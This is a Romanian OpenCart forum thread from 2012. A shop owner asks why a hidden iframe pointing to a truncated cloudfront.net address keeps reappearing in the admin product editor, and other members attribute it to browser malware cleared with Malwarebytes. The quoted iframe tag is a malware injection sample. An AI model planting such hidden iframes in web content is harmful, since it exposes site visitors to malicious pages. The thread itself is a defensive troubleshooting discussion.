Post by mariusene » Tue Feb 07, 2012 5:10 am

Salut,

Pe scurt, astazi la pranz cei la care am hostingul au avut ceva probleme (nu stiu ce anume) si web-site-urile pe care le aveam, cand nu mergeau, cand se incarcau, dar cu o lista mare de erori la inceput. Acum seara am incercat sa sa mai pun niste produse pe unul din ele, care este in lucru. Pe site totul este OK, dar in admin imi apare un "iframe" de care nu pot sa scap. Il sterg si cand salvez apare iar. La fiecare salvare mai apare inca unul si tot asa.

Cand am trecut in modul surce apare codul urmator:
<iframe src="http://d3lvr7yuk4uaui.cloudfront.net/d. ... RlZmluZWQ6" style="display: none; visibility: hidden;"></iframe></p>
Stie cineva despre ce este vorba, din ce cauza apare si cum scap de aceasta problema?
Site-ul cu problema este "www.securitatesisupraveghere.ro". Pe celelalte doua site-uri nu am intrat sa vad daca am aceeasi problema.

Attachments

printscreen.jpg

printscreen.jpg (25.86 KiB) Viewed 2391 times

Image

New member

Post by nicudica » Tue Feb 07, 2012 5:28 am

Saluty!!

Mare grija nu e bine cu acel iframe.. ai copiat documentatia de undeva poate...

Ce versiune de o.c ai?

Active Member

Location - Bucharest / Romania

Post by mariusene » Tue Feb 07, 2012 6:09 am

Am varianta 1.5.1.3

Descrierea o iau dintr-un fisier Excel si de obicei (dar nu mereu) o trec prin Notepad si o copiez de acolo in admin.

Am verificat si problema este si pe un alt site tot OC 1.5.1.3 dar nu si pe unul varianta 1.4.9.x

Image

New member

Post by titusel » Tue Feb 07, 2012 6:59 am

trebuiesc verificate codurile sursa din admin la controller, model si view, o posibilitate mai simpla ar fii, daca nu ai facut modificari la fisierele din admin, sa le inlocuiesti cu unele sigure, direct din arhiva versiuni care o ai.

Active Member

Location - Bucharest, Romania

Post by mariusene » Tue Feb 07, 2012 7:14 am

Nu am modificari in admin.
O sa incerc sa le inlocuiesc.

Multumesc

Image

New member

Post by dragosh » Thu Feb 09, 2012 2:48 pm

Salut,

Saptamana trecuta am inlocuit vechiul editor din CMSul pe care il folosesc cu CKEditor si am observat ca in unele articole postate *doar* de o anumita persoana aparea acelasi cod suspect cu acelasi comportament descris de tine: la fiecare save mai aparea un iframe. De mentionat ca foloseste FF 10.x.

Am tot cautat pe google despre problema si o au si altii:

http://www.google.vu/support/forum/p/Ch ... 89fb&hl=en

http://www.experts-exchange.com/Virus_a ... 75384.html (aici trebuie sa lasi informatii card)

http://community.spiceworks.com/topic/1 ... -net-virus

Aparent este vorba despre un virus, ultimul post da si o solutie: "Run Combofix from bleepingcomputer.com and/or malwarebyte" si asta rezolva problema.

In nici un caz nu este vorba despre codul sursa al editorului. Eu de ex am putut sa sterg fara probleme acel iframe si nici nu imi apare la save.

Mai mult de atat, am scris si un plugin de CKEditor care elemina automat toate tagurile iframe - ti-l pot pune la dispozitie daca te intereseaza. Il voi integra si folosi in functie de rolul (permisiunile) pe care le are cineva in interfata de administrare (e.g. Admin poate insera iframe, Contributor nu poate).

HTH,
Dragos

Newbie

Post by thepixelmaker » Sat Feb 11, 2012 3:31 am

Dragos are dreptate,
si eu am avut aceasi problema, banuiesc un virus sau ceva asemanator de pe calculatorul propriu. In Firefox nu puteam scapa de iframe, dar am reusit cu Chrome. Oricum am facut o scanare cu malwarebytes si pana acum pare a ca s-a rezolvat si in Firefox. Interesant ca in aceiasi perioada imi mai aparea din cand in cand si un mesaj de eroare de flash averizandu-ma ca se doreste accesarea paginii cloudfront.net.

Newbie